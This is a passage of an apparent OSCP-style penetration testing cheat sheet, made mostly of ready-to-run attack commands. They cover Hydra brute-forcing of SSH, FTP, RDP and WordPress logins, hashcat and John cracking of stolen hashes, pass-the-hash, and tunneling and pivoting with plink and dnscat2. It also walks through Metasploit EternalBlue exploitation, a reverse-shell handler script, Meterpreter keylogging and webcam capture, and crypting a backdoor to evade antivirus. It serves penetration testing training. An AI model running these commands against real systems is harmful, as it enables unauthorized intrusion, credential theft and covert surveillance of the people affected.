`hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
- Hydra SSH using a list of users and passwords
`hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
- Hydra SSH using a known password and a username list
`hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
- Hydra SSH against a known username on port 22
`hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt`
- Hydra POP3 brute force
`hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V`
- Hydra SMTP brute force
`hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V`
- Hydra attack on an HTTP GET 401 login with a dictionary
`hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
- Hydra attack on Windows Remote Desktop with rockyou
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp:$ip`
`hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
- Password Hash Attacks
[*https://crackstation.net/*](https://crackstation.net/)
Needed to install new drivers to get my GPU cracking to work on the Kali Linux VM and I also had to use the `--force` parameter: `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev` and `apt-get install pocl-opencl-icd`
Cracking Linux Hashes - /etc/shadow file
```
500  | md5crypt $1$, MD5(Unix)       | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)   | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
Cracking Windows Hashes
```
3000 | LM   | Operating-Systems
1000 | NTLM | Operating-Systems
```
Cracking Common Application Hashes
```
900   | MD4      | Raw Hash
0     | MD5      | Raw Hash
5100  | Half MD5 | Raw Hash
100   | SHA1     | Raw Hash
10800 | SHA-384  | Raw Hash
1400  | SHA-256  | Raw Hash
1700  | SHA-512  | Raw Hash
```
Create a .hash file with all the hashes you want to crack, e.g. puthasheshere.hash:
```
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
```
Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
`hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
Wordpress clear text: test
Hashcat example cracking Wordpress passwords using rockyou:
`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
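Choosing the right `-m` value is the first step for the hashcat commands above. This added example (not from the original guide) maps a hash string to the mode numbers in the tables using only its prefix and length, handles the `LM:NT` pair format used with `pth-winexe` further down, and pulls crackable fields out of `/etc/shadow` style lines; the shadow sample is constructed apart from the md5crypt hash already on the page.

```python
# Added example (not from the original guide): pick hashcat -m candidates for a
# hash string from the prefix/length tables above, before running hashcat.
import re

# Salted Unix / WordPress formats: (mode, description, prefix regex).
PREFIXED_MODES = [
    (500, "md5crypt $1$, MD5(Unix)", re.compile(r"^\$1\$")),
    (3200, "bcrypt $2*$, Blowfish(Unix)", re.compile(r"^\$2[abxy]?\$")),
    (7400, "sha256crypt $5$, SHA256(Unix)", re.compile(r"^\$5\$")),
    (1800, "sha512crypt $6$, SHA512(Unix)", re.compile(r"^\$6\$")),
    (400, "phpass $P$ (WordPress)", re.compile(r"^\$[PH]\$")),
]

# Raw hex digests carry no prefix, so only the length narrows the mode.
HEX_MODES_BY_LENGTH = {
    16: [(5100, "Half MD5")],
    32: [(0, "MD5"), (900, "MD4"), (1000, "NTLM"), (3000, "LM")],
    40: [(100, "SHA1")],
    64: [(1400, "SHA-256")],
    96: [(10800, "SHA-384")],
    128: [(1700, "SHA-512")],
}

# LM hash of the empty password: appears as the LM half when LM storage is
# disabled (the SMBHASH value further down in this guide starts with it).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def identify(hash_str):
    """Candidate (mode, description) pairs for one hash string; [] if unknown."""
    h = hash_str.strip()
    for mode, desc, rx in PREFIXED_MODES:
        if rx.match(h):
            return [(mode, desc)]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_MODES_BY_LENGTH.get(len(h), [])
    return []


def modes(hash_str):
    """Just the sorted mode numbers, for building a hashcat command line."""
    return sorted(m for m, _ in identify(hash_str))


def split_pwdump(pair):
    """Split an 'LM:NT' pair (pwdump / pth-winexe format) and flag an empty LM half."""
    lm, nt = pair.strip().split(":")
    return {"lm": lm, "nt": nt, "lm_is_empty": lm.lower() == EMPTY_LM,
            "nt_modes": modes(nt)}


def hashes_from_shadow(text):
    """(user, hash, modes) for /etc/shadow style lines, skipping locked accounts."""
    out = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2 and parts[1] and parts[1][0] not in "*!":
            out.append((parts[0], parts[1], modes(parts[1])))
    return out


# Constructed sample: the md5crypt hash from the guide plus two locked accounts.
SAMPLE_SHADOW = """root:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/:17400:0:99999:7:::
daemon:*:17400:0:99999:7:::
www-data:!:17400:0:99999:7:::
"""

if __name__ == "__main__":
    for user, h, ms in hashes_from_shadow(SAMPLE_SHADOW):
        print(user, ms, "hashcat -m %d ..." % ms[0])
    print(modes("$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/"))
    print(split_pwdump(EMPTY_LM + ":6F403D3166024568403A94C3A6561896"))
```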
[*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
`hash-identifier`
`unshadow passwd-file.txt shadow-file.txt`
`unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
- John the Ripper - Password Hash Cracking
`john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`
`john --format=descrypt hash --show`
- Passing the Hash in Windows
Dump the password hashes and attempt a pass-the-hash attack
against another system:
`export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
`pth-winexe -U administrator //$ip cmd`
## Networking, Pivoting and Tunneling
- Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
`# bindaddress bindport connectaddress connectport`
`w.x.y.z 53 a.b.c.d 80`
- SSH Local Port Forwarding: supports bi-directional communication channels
`host>:<remote port>`
- SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non-routable network
`host>:<local port>`
- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
`<target>`
- Proxychains - Perform nmap scan within a DMZ from an external computer
`ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
`ssh -f -N -R 2222:<local host>:22 root@<remote host>`
2222
`ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
using proxy chains
`proxychains nmap --top-ports=20 -sT -Pn $ip/24`
- HTTP Tunneling
`nc -vvn $ip 8888`
- Traffic Encapsulation - Bypassing deep packet inspection
On server side:
`sudo hts -F <server ip addr>:<port of your app> 80`
On client side:
`sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80`
stunnel
- Tunnel Remote Desktop (RDP) from a popped Windows machine to your network
`plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`
- Tunnel Remote Desktop (RDP) from a popped Windows machine using HTTP Tunnel (bypass deep packet inspection)
`httptunnel_client.exe`
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`
- VLAN Hopping
`chmod 700 frogger.sh`
`./frogger.sh`
- VPN Hacking
`./udp-protocol-scanner.pl -p ike $ip`
`./udp-protocol-scanner.pl -p ike -f ip.txt`
`pip install pyip`
`git clone https://github.com/SpiderLabs/ikeforce.git `
Perform IKE VPN enumeration with IKEForce:
`./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic`
Bruteforce IKE VPN using IKEForce:
`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1`
Use ike-scan to capture the PSK hash:
`ike-scan`
`ike-scan TARGET-IP`
`ike-scan -A TARGET-IP`
`ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key`
`ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP`
Use psk-crack to crack the PSK hash:
`psk-crack hash-file.txt`
`psk-crack -b 5 TARGET-IPkey`
`psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key`
`psk-crack -d /path/to/dictionary-file TARGET-IP-key`
- PPTP Hacking
NMAP PPTP Fingerprint:
`nmap -Pn -sV -p 1723 TARGET(S)`
PPTP Dictionary Attack:
`thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
- Port Forwarding/Redirection
- PuTTY Link tunnel - SSH Tunneling
`plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`
- SSH Pivoting
`ssh -D <local host>:1010 -p 22 user@<remote host>`
- DNS Tunneling
```
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
```
```
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
```
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
`dnscat --host <dnscat server ip>`
## The Metasploit Framework
- See [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/) in the Essentials
- Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework) Translate them for use on OSCP LAB or EXAM.
- Metasploit
`systemctl start postgresql`
`systemctl enable postgresql`
- MSF Syntax
`msfconsole `
`msfconsole -q`
`show -h`
`show auxiliary`
`use auxiliary/scanner/snmp/snmp_enum`
`use auxiliary/scanner/http/webdav_scanner`
`use auxiliary/scanner/smb/smb_version`
`use auxiliary/scanner/ftp/ftp_login`
`use exploit/windows/pop3/seattlelab_pass`
`info`
`show options`
`set RHOSTS 192.168.1.1-254`
`set THREADS 10`
`run`
`exploit`
`search type:auxiliary login`
- Metasploit Database Access
`hosts`
`db_nmap`
`services -p 443`
`services -p 443 --rhosts`
- Staged and Non-staged
- MS 17-010 - EternalBlue
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
`dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit`
2. Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console
I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
`use exploit/windows/smb/eternalblue_doublepulsar`
`msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10`
`RHOST => 10.11.1.73`
`msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe`
`PROCESSINJECT => spoolsv.exe`
`msf exploit(eternalblue_doublepulsar) > run`
- Experimenting with Meterpreter
`sysinfo`
`getuid`
`search -f *pass*.txt`
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
`shell`
`exit`
- Metasploit Exploit Multi Handler
`use exploit/multi/handler`
`set PAYLOAD windows/meterpreter/reverse_https`
`set LHOST $ip`
`set LPORT 443`
`exploit`
`[*] Started HTTPS reverse handler on https://$ip:443/`
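The same handler as a resource script, which is how you keep it running across multiple callbacks instead of retyping it. This is an added example for this guide, not a file from the page or from the Metasploit project; the LHOST value is a placeholder for your own listening address.

```text
# handler.rc (added example, not from the original page)
# Run with:  msfconsole -q -r handler.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
# placeholder address: replace with the interface the target can reach
set LHOST 192.0.2.10
set LPORT 443
# keep the listener up after the first session instead of stopping
set ExitOnSession false
# -j runs the handler as a background job, -z does not auto-interact
exploit -j -z
```

With `ExitOnSession false` and `exploit -j -z` the console stays free for `sessions -l` and `sessions -i <id>` while further callbacks are accepted.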
- Building Your Own MSF Module
`cd ~/.msf4/modules/exploits/linux/misc`
`cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb`
`nano crossfire.rb`
- Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
- Meterpreter Post Exploitation Features
`background`
## Bypassing Antivirus Software
- Crypting Known Malware with Software Protectors
`cp /usr/share/windows-binaries/Hyperion-1.0.zip .`
`unzip Hyperion-1.0.zip`
`cd Hyperion-1.0/`
`i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe`
`cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .`
`cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .`
`wine hyperion.exe ../backdoor.exe ../crypted.exe`
## OSCP Course Review
- Offensive Security’s PWB and OSCP — My Experience
[*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
- OSCP Journey
[*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
- Down with OSCP
[*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
- Jolly Frogs - Tech Exams (Very thorough)
[*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)
## OSCP Inspired VMs and Walkthroughs
- [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
[*https://www.root-me.org/*](https://www.root-me.org/)
- Walkthrough of Tr0ll-1 - Inspired by the trolling found in the OSCP exam [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)
- Another walkthrough for Tr0ll-1 [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)
- Taming the troll - walkthrough [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
- Tr0ll download on Vuln Hub [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
- Sickos - Walkthrough:
[*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)
- Sickos - Inspired by Labs in OSCP [*https://www.vulnhub.com/series/sickos,70/*](https://www.vulnhub.com/series/sickos,70/)
- Lord of the Root Walk Through
[*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
- Lord Of The Root: 1.0.1 - Inspired by OSCP [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
- Tr0ll-2 Walk Through
[*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
- Tr0ll-2 [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
## Cheat Sheets
- Penetration Tools Cheat Sheet
[*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
- Pen Testing Bookmarks
[*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)
- OSCP Cheatsheets
[*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
- CEH Cheatsheet
[*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
- Net Bios Scan Cheat Sheet
[*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
- Reverse Shell Cheat Sheet
[*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
- NMap Cheat Sheet
[*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
- Linux Commands Cheat Sheet
[*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
- Security Hardening CentOS 7
[*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
- MetaSploit Cheatsheet
[*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
- Google Hacking Database:
[*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
- Windows Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
- Linux Assembly Language Mega Primer
[*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
- A bit dated but most is still relevant
[*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)
- NetCat
- [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)
- [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
- [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
- [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
- [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
- [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
## Essentials
- Exploit-db
[*https://www.exploit-db.com/*](https://www.exploit-db.com/)
- SecurityFocus - Vulnerability database
[*http://www.securityfocus.com/*](http://www.securityfocus.com/)
- Vuln Hub - Vulnerable by design
[*https://www.vulnhub.com/*](https://www.vulnhub.com/)
- Exploit Exercises
[*https://exploit-exercises.com/*](https://exploit-exercises.com/)
- SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
- Security Tube
[*http://www.securitytube.net/*](http://www.securitytube.net/)
- Metasploit Unleashed - free course on how to use Metasploit
[*https://www.offensive-security.com/metasploit-unleashed/*](https://www.offensive-security.com/metasploit-unleashed/)
- 0Day Security Enumeration Guide
[*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)
- Github IO Book - Pen Testing Methodology
[*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
## Windows Privilege Escalation
- Fuzzy Security
[*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
- accesschk.exe
https://technet.microsoft.com/en-us/sysinternals/bb664922
- Windows Priv Escalation For Pen Testers
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- Elevating Privileges to Admin and Further
https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
- Transfer files to windows machines
https://blog.netspi.com/15-ways-to-download-a-file/